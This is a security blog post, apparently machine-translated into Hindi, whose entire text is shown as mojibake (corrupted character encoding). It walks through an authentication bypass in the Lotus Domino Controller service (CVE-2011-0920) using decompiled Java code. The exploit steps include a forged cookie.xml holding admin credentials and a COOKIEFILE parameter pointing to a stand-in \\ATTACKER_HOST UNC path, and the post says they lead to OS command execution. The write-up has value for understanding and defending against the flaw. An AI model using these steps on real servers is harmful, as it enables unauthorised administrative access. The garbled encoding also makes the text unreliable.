рд▓реЛрдЯрд╕ рдбреЛрдорд┐рдиреЛрдЬ рдореЗрдВ рдкреНрд░рд╡реЗрд╢

рд▓реЛрдЯрд╕ рдбреЛрдорд┐рдиреЛрдЬрд╝ рдирд┐рдпрдВрддреНрд░рдХ рд╕реЗрд╡рд╛ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЛ рдЙрдЬрд╛рдЧрд░ рдХрд░рдирд╛



рд╣рд╛рд▓ рд╣реА рдореЗрдВ, рдореИрдВ рдЕрдХреНрд╕рд░ рдХрд╣рд╛рдирд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдмрддрд╛рддрд╛ рд╣реВрдВ рдХрд┐ рдХреИрд╕реЗ рдПрдХ рд╕рд╛рдзрд╛рд░рдг рдкреЗрди-рдЯреЗрд╕реНрдЯ рдкрд░ рд▓реЛрдХрдкреНрд░рд┐рдп рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ рдореЗрдВ 0-рджрд┐рди рдХреА рднреЗрджреНрдпрддрд╛ рдХреА рдкрд╣рдЪрд╛рди рдХрд░рдирд╛ рдпрд╛ рдПрдХ рдирд┐рдЬреА рд╢реЛрд╖рдг рд╡рд┐рдХрд╕рд┐рдд рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реИред рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдкреЗрди рдкрд░реАрдХреНрд╖рдг рдХреЗ рджреМрд░рд╛рди рдЗрд╕ рддрд░рд╣ рдХреА рд╕рдорд╕реНрдпрд╛ рд╢рд╛рдпрдж рд╣реА рдХрднреА рдФрд░ рдЪреБрдирд┐рдВрджрд╛ рд░реВрдк рд╕реЗ рд╣рд▓ рдХреА рдЬрд╛рддреА рд╣реИ, рдФрд░ рдЗрд╕рдХреЗ рдХрд╛рд░рдг рд╣реИрдВред

рдлрд┐рд░ рднреА, рдореИрдВ рдПрдХ рдХрд╣рд╛рдиреА (рд╣рд╛рдБ, рдПрдХ рдХрд╣рд╛рдиреА) рд╕рд╛рдЭрд╛ рдХрд░рдирд╛ рдЪрд╛рд╣рддрд╛ рд╣реВрдВ рдХрд┐ рдХреИрд╕реЗ, рдЬрдм рдЗрд╕ рддрд░рд╣ рдХреА рд╕рдорд╕реНрдпрд╛рдУрдВ рдХреЛ рд╣рд▓ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдХрд▓рдо рдкрд░реАрдХреНрд╖рдг рдПрдХ рд╡реЗрдм рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХреЗ рдорд╛рдкрджрдВрдбреЛрдВ рдореЗрдВ рдиреАрд░рд╕ рд╕реНрдХреИрдирд┐рдВрдЧ, рдмреНрд░реВрдЯ рдмрд▓ рдФрд░ рд╕реНрдЯрдлрд┐рдВрдЧ рдХреЛрдЯреНрд╕ рдХреЗ рджрд╛рдпрд░реЗ рд╕реЗ рдкрд░реЗ рдЬрд╛рддрд╛ рд╣реИред рдЕрд░реНрдерд╛рддреН, рдпрд╣ рдкреЛрд╕реНрдЯ рд▓реЛрдЯрд╕ рдбреЛрдорд┐рдиреЛрдЬрд╝ рд╕рд░реНрд╡рд░ рдирд┐рдпрдВрддреНрд░рдХ рдореЗрдВ рдПрдХ рд╕рд╛рдзрд╛рд░рдг рдмрдЧ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдмрд╛рдд рдХрд░реЗрдЧреА, рдХрд┐ рдХреИрд╕реЗ рдПрдХ рдирд┐рдЬреА рд╢реЛрд╖рдг рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рдерд╛, рдФрд░ рдПрдХ рд╢реВрдиреНрдп-рджрд┐рди рдХреА рд╕рдорд╕реНрдпрд╛ рднреА рдкрд╛рдИ рдЧрдИ рдЬреЛ рдЖрдЬ рднреА рдкреНрд░рд╛рд╕рдВрдЧрд┐рдХ рд╣реИред





рдкреЗрдиреЗрдЯреНрд░реЗрд╢рди рдЯреЗрд╕реНрдЯ


рддреЛ, рдкреНрд░рд╡реЗрд╢ рдкрд░реАрдХреНрд╖рд╛ред рдпрд╣ рд╡рд┐рд╖рдп рд╣рд░ рд╕рд╛рд▓ рд╡рд┐рднрд┐рдиреНрди рдмреНрд▓реЙрдЧреЛрдВ рдФрд░ рд╡рд┐рднрд┐рдиреНрди рд╡рд┐рд╢реЗрд╖рдЬреНрдЮреЛрдВ рдкрд░ рд▓рдЧрд╛рддрд╛рд░ рдкреЗрд╢ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдФрд░ рдпрд╣ рдХреЛрдИ рджреБрд░реНрдШрдЯрдирд╛ рдирд╣реАрдВ рд╣реИ: рдЗрд╕ рд╕реЗрд╡рд╛ рдореЗрдВ рдХрдИ рдЕрд▓рдЧ-рдЕрд▓рдЧ рд╕реВрдХреНрд╖реНрдорддрд╛рдПрдВ рдФрд░ рдиреБрдХрд╕рд╛рди рд╣реИрдВред рд▓реЗрдХрд┐рди рдореИрдВ рдЗрд╕ рдЪреАрдЬ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛, рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдФрд░ рд╕рд╛рдордЧреНрд░реА рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдкрд╛рдиреА рдХреЛ рдирд╣реАрдВ рд╣рд┐рд▓рд╛рдКрдВрдЧрд╛, рдореИрдВ рдЦреБрдж рдХрд╛рдо рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдмрд╛рдд рдХрд░рдирд╛ рдЪрд╛рд╣рддрд╛ рд╣реВрдВред рдкреЗрди рдЯреЗрд╕реНрдЯ рдХреНрдпрд╛ рд╣реЛрддрд╛ рд╣реИ рдЗрд╕рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдкреЗрди рдЯреЗрд╕реНрдЯред

рдХреЛрдИ рднреА рдкреЗрди рдкрд░реАрдХреНрд╖рдХ рдореБрдЦреНрдп рдХрд╛рд░реНрдп рдХреЛ рдкреВрд░рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдИ рдЙрдк-рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рд╣рд▓ рдХрд░рддрд╛ рд╣реИ - рд╕реВрдЪрдирд╛ рдкреНрд░рдгрд╛рд▓реА рдХреЗ рдШрдЯрдХреЛрдВ рдкрд░ рд╣рдорд▓реЛрдВ рдХрд╛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдиред рдЙрд╕реА рд╕рдордп, рдореИрдВ рдХреЛрд╖реНрдардХ рдХреЗ рдмрд╛рд╣рд░ рдореБрдЦреНрдп рдХрд╛рд░реНрдп рдХреЗ рд╡рд┐рд╖рдп рдкрд░ рдПрдХ рд╡рд┐рд╕реНрддреГрдд рд╡рд┐рд╡рд░рдг рдФрд░ рд╕рдВрднрд╛рд╡рд┐рдд рдмрджрд▓рд╛рд╡ рдЫреЛрдбрд╝ рджреВрдВрдЧрд╛, рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рдлрд┐рд░ рд╕реЗ рджрд┐рд▓рдЪрд╕реНрдк рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣рд╛рдВ рджреЛ рдпрд╛ рддреАрди рдЙрдк-рдХрд╛рд░реНрдп рд╣реИрдВ рдЬреЛ "рдЕрддреНрдпрд╛рдзреБрдирд┐рдХ" рд╣реИрдВ:



рдРрд╕рд╛ рд╣реБрдЖ рдХрд┐ рдПрдХ рдкреЗрди-рдЯреЗрд╕реНрдЯ рдХреЗ рджреМрд░рд╛рди, рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рд░реВрдк рд╕реЗ рдЙрдкрд▓рдмреНрдз рдХрд╛рд░рдирд╛рдореЛрдВ рдХреЗ рдмрд┐рдирд╛, рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ PoCs рдпрд╛ рд╕рдорд╕реНрдпрд╛ рдХреЗ рд╡рд┐рд╕реНрддреГрдд рд╡рд┐рд╡рд░рдг рдХреЗ рдмрд┐рдирд╛ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рдПрдХ рдкреВрд░реЗ рд╕реЗрдЯ рдХреА рдЦреЛрдЬ рдХреА рдЧрдИ рдереАред рдЗрд╕рд▓рд┐рдП, рдЗрд╕ рддрд░рд╣ рдХреА рднреЗрджреНрдпрддрд╛ рдХреЗ рд▓рд┐рдП, рдЕрдкрдиреЗ рдЖрдк рд╕реЗ рд╕рдм рдХреБрдЫ рд╕реАрдЦрдиреЗ рдФрд░ рдПрдХ рдирд┐рдЬреА рд╢реЛрд╖рдг рд▓рд┐рдЦрдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред

рд▓реЛрдЯрд╕ рдбреЛрдорд┐рдиреЛрдЬрд╝ рд╕рд░реНрд╡рд░ рдирд┐рдпрдВрддреНрд░рдХ рдореЗрдВ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдмрд╛рдИрдкрд╛рд╕

CVE-2011-0920


рдЗрд╕ рднреЗрджреНрдпрддрд╛ рдХреА рдЦреЛрдЬ рдкреИрдЯреНрд░рд┐рдХ рдХрд╛рд░реНрд▓рд╕рди рдиреЗ рдХреА рдФрд░ ZDI рдореЗрдВ рдмреЗрдЪреА рдЧрдИред рддреЛ ZDI рд╡реЗрдмрд╕рд╛рдЗрдЯ рд╕реЗ рд╡рд┐рд╡рд░рдг рдХреЗрд╡рд▓ рдЬрд╛рдирдХрд╛рд░реА рд╣реИ рдЬреЛ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╣реИред рд▓рдШреБ рдирд┐рд╡реГрддреНрддрд┐:

тАЬрдбреЛрдорд┐рдиреЛрдЬрд╝ рдХрдВрдЯреНрд░реЛрд▓рд░ рд╕рд░реНрд╡рд┐рд╕, рдЯреАрд╕реАрдкреА рдкреЛрд░реНрдЯ 2050 рдореЗрдВ рднреЗрджреНрдпрддрд╛ред рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рджреМрд░рд╛рди, рдПрдХ рд╣рдорд▓рд╛рд╡рд░ UNC рдкрде рдХреЗ рд░реВрдк рдореЗрдВ COOKIEFILE рдкреИрд░рд╛рдореАрдЯрд░ рдорд╛рди рд╕реЗрдЯ рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдЗрд╕ рдкреНрд░рдХрд╛рд░ рд╕реЗ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЗ рджреМрд░рд╛рди рд╕реНрд░реЛрдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдбреЗрдЯрд╛ рдлрд╝рд╛рдЗрд▓ рдФрд░ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдорд╛рди рджреЛрдиреЛрдВ рдкрд░ рдирд┐рдпрдВрддреНрд░рдг рд╕реНрдерд╛рдкрд┐рдд рд╣реЛрддрд╛ рд╣реИред рдпрд╣ рдЖрдкрдХреЛ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╕рддреНрдпрд╛рдкрди рддрдВрддреНрд░ рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдФрд░ рдкреНрд░рд╢рд╛рд╕рди рдХрдВрд╕реЛрд▓ рддрдХ рдкрд╣реБрдВрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рд╕рд┐рд╕реНрдЯрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рдХреА рдУрд░ рдЬрд╛рддрд╛ рд╣реИред "

рд╡рд┐рд╡рд░рдг, рд╣рд╛рд▓рд╛рдВрдХрд┐ рд╡рд┐рд╕реНрддреГрдд рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдЬреЛ рд╣реЛ рд░рд╣рд╛ рд╣реИ рдЙрд╕рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдкрд░реНрдпрд╛рдкреНрдд рдХрд╣рддреЗ рд╣реИрдВред рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ рдЖрдк рдкреЛрд░реНрдЯ рдирдВрдмрд░ 2050 рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдХреБрдЫ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ COOKIEFILE рдкреИрд░рд╛рдореАрдЯрд░ рдХреЛ рд╕реНрд▓рд┐рдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬреЛ \\ ATTACKER_HOST \ FILE рдЬреИрд╕реЗ рдкрде рдХреЛ рджрд░реНрд╢рд╛рддрд╛ рд╣реИред рдФрд░ рдЗрд╕ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рд░рдЦреЗрдВ рдФрд░ рдЙрд╕реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд▓реЙрдЧ рдЗрди рдХрд░реЗрдВред рдпрд╣ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдФрд░ рдлрд╝рд╛рдЗрд▓ рдкреНрд░рд╛рд░реВрдк рдХреЛ рдкрд╛рд░реНрд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмрд╕ рдереЛрдбрд╝рд╛ рд╕рд╛ рд░рд╣ рдЧрдпрд╛ рд╣реИред Nmap рд╕реНрдХреИрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ, рдЖрдк рдпрд╣ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рд╕рднреА рдХрд╛рдо SSL рдкрд░ рдХрд┐рдП рдЧрдП рд╣реИрдВ, рд▓реЗрдХрд┐рди SSL рдЖрд╡рд░рдг рдореЗрдВ рд╕рдВрдЪрд╛рд░ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рджреЗрдЦрд╛ рдЬрд╛рдирд╛ рдмрд╛рдХреА рд╣реИред рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдпрд╣ рдЕрддреНрдпрдВрдд рд╕рд░рд▓ рд╣реИ: рдпрд╣ рдзреНрдпрд╛рди рд░рдЦрдирд╛ рдкрд░реНрдпрд╛рдкреНрдд рд╣реИ рдХрд┐ рд▓реЛрдЯрд╕ рдбреЛрдорд┐рдиреЛрдЬрд╝ рдХрдВрдЯреНрд░реЛрд▓рд░ рд╕реЗрд╡рд╛ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдЬрд╛рд╡рд╛, рдХреНрд▓рд╛рдЗрдВрдЯ рдФрд░ рд╕рд░реНрд╡рд░ рджреЛрдиреЛрдВ рднрд╛рдЧреЛрдВ, рд╕рднреА рдХреЛ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд▓рд┐рдЦреА рдЧрдИ рд╣реИ:

C:\Program Files\IBM\Lotus\Domino\Data\domino\java\dconsole.jar

рдпрд╣ рдлрд╝рд╛рдЗрд▓ рдЖрд╕рд╛рдиреА рд╕реЗ рд╡рд┐рдШрдЯрд┐рдд рд╣реЛ рдЬрд╛рддреА рд╣реИ (рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдбреАрдЬреЗ рдЬрд╛рд╡рд╛ рдбреЗрдХреЛрдореНрдкреЗрд▓рд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛, рд╣рд╛рд▓рд╛рдВрдХрд┐ рдпрд╣ рдЙрддрдирд╛ рдЕрдЪреНрдЫрд╛ рдирд╣реАрдВ рд╣реИ рдЬрд┐рддрдирд╛ рд╣рдо рдЪрд╛рд╣реЗрдВрдЧреЗ)ред рдЙрд╕рдХреЗ рдмрд╛рдж, рд╣рдо рдЕрдиреБрд░реЛрдзреЛрдВ рдХреЛ рдЬреЛрдбрд╝рдиреЗ рдФрд░ рд╕рдВрд╕рд╛рдзрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЬрд┐рдореНрдореЗрджрд╛рд░ рдХреЛрдб рдХреА рддрд▓рд╛рд╢ рдХрд░рддреЗ рд╣реИрдВред рдЕрдиреБрд░реЛрдз рдкреНрд░рд╕рдВрд╕реНрдХрд░рдг рдХрдХреНрд╖рд╛ NewClient рдореЗрдВ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЗрд╕ рд╢реНрд░реЗрдгреА рдореЗрдВ, рдлреЙрд░реНрдо рдХреЗ рд╕рд╛рджреЗ рдЕрдиреБрд░реЛрдз: #COMMAND param1, param2, ... рдкрд╛рд░реНрд╕ рдХрд┐рдП рдЧрдП рд╣реИрдВред рд╕рднреА рдХрдорд╛рдВрдб рдЕрд▓рдЧ-рдЕрд▓рдЧ рд╡рд░реНрдгрд┐рдд рд╣реИрдВ:

  . . . //  ReadFromUser(); // s1 тАУ   2050/tcp if(s1.equals("#EXIT")) return 2; . . . if(s1.equals("#APPLET")) return 6; . . . if(s1.equals("#COOKIEFILE")) if(stringtokenizer.hasMoreTokens()) //     - // : #COOKIEFILE <cookieFilename> cookieFilename = stringtokenizer.nextToken().trim(); // return 7; . . . if(s1.equals("#UI")) if(stringtokenizer.hasMoreTokens()) // : #UI <login>,<password> usr = stringtokenizer.nextToken(",").trim(); //Login if(usr == null) return 4; if(stringtokenizer.hasMoreTokens()) // passwords pwd = stringtokenizer.nextToken().trim(); //Password return 0; 


рддреЛ рд╣рдо COOKIEFILE рдкреИрд░рд╛рдореАрдЯрд░ рд╕реЗ рдорд┐рд▓реЗред рд╣рд╛рд▓рд╛рдВрдХрд┐, рдПрдХ рдкрд░реНрдпрд╛рдкреНрдд рдирд╣реАрдВ рд╣реИред рдореБрдЦреНрдп рд▓реВрдк рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ:

  do { int i = ReadFromUser(); //Point.1 if(i == 2) break; //if #EXIT . . . if(i == 6) //if #APPLET Point.2 { appletConnection = true; continue; } . . . //     admindata.xml . . . if(userinfo == null) //Point.9 { //     admindata.xml WriteToUser("NOT_REG_ADMIN"); continue; } . . . if(!appletConnection) //Point.3 flag = vrfyPwd.verifyUserPassword(pwd, userinfo.userPWD()) else flag = verifyAppletUserCookie(usr, pwd); // if #APPLET . . . if(flag) WriteToUser("VALID_USER"); else WriteToUser("WRONG_PASSWORD"); } while(true); if(flag) { //  . . . }else { // } 


рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рджреЛ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдХрд▓реНрдк (Point.3) рд╣реИрдВред рдкрд╣рд▓рд╛ рд▓реЙрдЧрд┐рди рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рджреНрд╡рд╛рд░рд╛ рд╕рд╛рдзрд╛рд░рдг рд╣реИ, рдФрд░ рджреВрд╕рд░рд╛ рд▓реЙрдЧрд┐рди рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рджреНрд╡рд╛рд░рд╛ рднреА рд╣реИ, рд▓реЗрдХрд┐рди COOKIEFILE рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗред рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ, рджреВрд╕рд░рд╛ рд╡рд┐рдХрд▓реНрдк рдХреЗрд╡рд▓ рддрднреА рдЪреБрдирд╛ рдЬрд╛рддрд╛ рд╣реИ рдЬрдм рдЙрд╕рд╕реЗ рдкрд╣рд▓реЗ рдПрдХ #APPLET (рдкреНрд╡рд╛рдЗрдВрдЯ.2) рдХрдорд╛рдВрдб рдерд╛ред рд╕рднреА рдЖрджреЗрд╢реЛрдВ рдХреЛ рдПрдХ рд▓реВрдк рдореЗрдВ рдмрд╛рд░реА-рдмрд╛рд░реА рд╕реЗ рдкрдврд╝рд╛ рдЬрд╛рддрд╛ рд╣реИ (Point.1)ред рдЗрд╕рд▓рд┐рдП, рд╕рд┐рд░реНрдл #COOKIEFILE рдкрд░реНрдпрд╛рдкреНрдд рдирд╣реАрдВ рд╣реИред

рдЕрдм рд╣рдо рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рдкреНрд░рд╛рд░реВрдк рдХреЛ рд╕рдордЭрддреЗ рд╣реИрдВ, рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдкреНрд░рд╛рд░реВрдк рдХреНрдпрд╛ рд╣реИ? рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░реЗрдВAppletUserCookie рдлрд╝рдВрдХреНрд╢рди рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ:

 File file = new File(cookieFilename); //Point.4 . . . inputstreamreader = new InputStreamReader(new FileInputStream(file), "UTF8"); . . . inputstreamreader.read(ac, 0, i); //Point.5 . . . String s7 = new String(ac); . . . do { if((j = s7.indexOf("<user ", j)) <= 0) //Point.6 break; int k = s7.indexOf(">", j); if(k == -1) break; String s2 = getStringToken(s7, "name=\"", "\"", j, k); //Point.7 . . . String s3 = getStringToken(s7, "cookie=\"", "\"", j, k); . . . String s4 = getStringToken(s7, "address=\"", "\"", j, k); . . . //Point.8 if(usr.equalsIgnoreCase(s2) && pwd.equalsIgnoreCase(s3) &&\ appletUserAddress.equalsIgnoreCase(s4)) { flag = true; break; } . . . } while(true); 


рдпрд╣ рджреЗрдЦрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдХрд┐ Point.4 рдХреЗ рд░реВрдк рдореЗрдВ рдЯрд┐рдкреНрдкрдгреА рдХреА рдЧрдИ рд▓рд╛рдЗрди рдореЗрдВ, рдлрд╝рд╛рдЗрд▓ рдЦреБрд▓рддреА рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдирд╛рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ (#COOKIEFILE рдХрдорд╛рдВрдб рдХреЛ рдкрд╛рд░реНрд╕ рдХрд░рддреЗ рд╕рдордп ReadFromUser () рдлрд╝рдВрдХреНрд╢рди рдореЗрдВ рд╡реИрд░рд┐рдПрдмрд▓ рдХреЛ рдкреНрд░рд╛рд░рдВрдн рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ)ред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдЗрдирдкреБрдЯ рдХреЛ рдХрд┐рд╕реА рднреА рддрд░рд╣ рд╕реЗ рдлрд╝рд┐рд▓реНрдЯрд░ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдХрдо рд╕реЗ рдХрдо UNC рдкрде рд╣реЛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕рдХреЗ рдмрд╛рдж, рдлрд╛рдЗрд▓ рдХреЛ рдПрд╕ 7 рд▓рд╛рдЗрди (рдкреЙрдЗрдВрдЯ.5) рдореЗрдВ рдкрдврд╝рд╛ рдЬрд╛рддрд╛ рд╣реИред рдлрд┐рд░ рдЗрд╕ рд▓рд╛рдЗрди рдХреЛ рдПрдХ рд▓реВрдк рдореЗрдВ рд╕рдВрд╕рд╛рдзрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬрд╣рд╛рдВ рдпрд╣ рджреЗрдЦрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдХрд┐ рдпрд╣ рдлреЙрд░реНрдо рдХреА рдПрдХ рд╕рд╛рдзрд╛рд░рдг XML рдлрд╛рдЗрд▓ рд╣реИ:

 <user name=тАЭusrтАЭ cookie=тАЭpassтАЭ address=тАЭvalueтАЭ> 


рдлрд┐рд░, рд▓рд╛рдЗрди рдореЗрдВ рдкреЙрдЗрдВрдЯ 8 рдХреЗ рд░реВрдк рдореЗрдВ рдЯрд┐рдкреНрдкрдгреА рдХреА рдЧрдИ, рд▓реЙрдЧрд┐рди, рдкрд╛рд╕рд╡рд░реНрдб рдФрд░ рдПрдбреНрд░реЗрд╕ рд╡реИрд▓реНрдпреВ (#ADDRESS) рдХреА рддреБрд▓рдирд╛ рд╕рдВрдмрдВрдзрд┐рдд рдЯреИрдЧ рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдХреЗ рд╕рд╛рде рдХреА рдЬрд╛рддреА рд╣реИред рдЪреВрдВрдХрд┐ рдпрд╣ рдлрд╝рд╛рдЗрд▓ рдПрдХ рджреВрд░рд╕реНрде рд╣реЛрд╕реНрдЯ (UNC рдкрде рдХреЛ рдЦрд┐рд╕рдХрд╛рдХрд░) рд╕реЗ рдкрдврд╝реА рдЬрд╛ рд╕рдХрддреА рд╣реИ, рдЗрд╕рд▓рд┐рдП рд╣рдорд▓рд╛ рд╕рд░рд▓ рдФрд░ рд╕реНрдкрд╖реНрдЯ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред

рдпрд╣ ZDI-11-110 рдХреЗ рд▓рд┐рдП рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╢реЛрд╖рдг рдХреИрд╕реЗ рджрд┐рдЦрддрд╛ рд╣реИ

1. рдПрдХ рдлрд╝рд╛рдЗрд▓ рдмрдирд╛рдПрдВ (рдХреБрдХреАред Xml):

 <user name="admin" cookie="dsecrg" address="10.10.0.1"> 


2. рд╣рдо ncat рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ



"#APPLET" рдХрдорд╛рдВрдб рд╕рд░реНрд╡рд░ рдХреЛ рдмрддрд╛рддрд╛ рд╣реИ рдХрд┐ рд╣рдо рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЗ рд▓рд┐рдП рдХреБрдХреА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред рдЕрдм, рдЬрдм рд╣рдо "# рдпреВрдЖрдИ" рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рд╕рд░реНрд╡рд░ рдЙрд╕ рдкрде рдХреЗ рд╕рд╛рде рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЦреЛрд▓рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдЧрд╛, рдЬрд┐рд╕реЗ рд╣рдордиреЗ "#COOKIEFILE" рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рджрд┐рдпрд╛ рдерд╛ред рдЬрд┐рд╕рдХреЗ рдмрд╛рдж рд╡рд╣ рд╡рд╣рд╛рдВ рд╕реЗ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдбреЗрдЯрд╛ рд▓реЗрдЧрд╛ рдФрд░ #UI рдХрдорд╛рдВрдб рдХреЗ рдмрд╛рдж рджрд░реНрдЬ рдХрд┐рдП рдЧрдП рд▓реЛрдЧреЛрдВ рд╕реЗ рдЙрд╕рдХреА рддреБрд▓рдирд╛ рдХрд░реЗрдЧрд╛ред "#EXIT" рдХрдорд╛рдВрдб рдХреЗ рдмрд╛рдж, рд╕рд░реНрд╡рд░ рдкреНрд░рдорд╛рдгрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд▓рд┐рдП рдЗрдирдкреБрдЯ рдкреНрд░реЛрд╕реЗрд╕рд┐рдВрдЧ рд╢реБрд░реВ рдХрд░реЗрдЧрд╛, рдФрд░ рдЖрдк рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рд╕реЗрд╡рд╛ рдХрд╛ рдкреНрд░рдмрдВрдзрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рд╕рд╛рде рд╣реА рдУрдПрд╕ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ!

